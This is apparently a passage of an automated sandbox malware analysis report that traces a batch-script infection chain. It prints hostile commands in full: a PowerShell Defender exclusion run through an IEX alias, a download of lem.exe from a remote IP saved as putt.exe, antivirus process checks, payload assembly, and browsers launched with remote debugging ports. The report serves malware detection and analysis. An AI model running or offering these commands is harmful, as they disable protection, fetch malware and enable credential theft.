                    Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" "
                    Source: C:\Users\user\AppData\Local\Temp\putt.exe File read: C:\Users\desktop.ini
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                    Source: Inf.com, 0000001A.00000002.3399122484.000000000101A000.00000004.00000020.00020000.00000000.sdmp, 1NG4W4EKN.26.dr, OZUAIEKXT.26.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" "
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')"
                    Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\putt.exe "C:\Users\user\AppData\Local\Temp\putt.exe"
                    Source: C:\Users\user\AppData\Local\Temp\putt.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 105235
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Authorization
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "aid" Division
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.com
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Glad + ..\Norway + ..\Tired m
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Inf.com m
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 --field-trial-handle=2332,i,17273091767045928010,3792722135638542356,262144 /prefetch:8
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                    Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2696 --field-trial-handle=2632,i,14551711620527519390,4323206914128980996,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2448 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5340 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6652 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2428,i,2039692680594755014,4633838608325150589,262144 /prefetch:8
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: napinsp.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: pnrpnsp.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: wshbth.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: nlaapi.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: winrnr.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: dbghelp.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: ntmarta.dll
                    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\putt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

                    Data Obfuscation

                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')"
                    Source: C:\Users\user\AppData\Local\Temp\putt.exe Code function: 14_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,14_2_00406328
                    Source: putt.exe.9.dr Static PE information: real checksum: 0x13b848 should be: 0x144e84
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD3458D2A5 pushad ; iretd 3_2_00007FFD3458D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD346A00BD pushad ; iretd 3_2_00007FFD346A00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD346A6EF2 push eax; ret 3_2_00007FFD346A6F59
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFD346A08CD push E95A0A1Ch; ret 9_2_00007FFD346A0909
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFD346A00BD pushad ; iretd 9_2_00007FFD346A00C1
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_00740315 push cs; retn 0073h 26_2_00740318
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_00710DE6 push ecx; ret 26_2_00710DF9
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_0070DC7C push AA0074CFh; iretd 26_2_0070DC87

                    Persistence and Installation Behavior

                    Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\putt.exe

                    Boot Survival

                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_007826DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,26_2_007826DD
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Code function: 26_2_0070FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,26_2_0070FC7C
                    Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
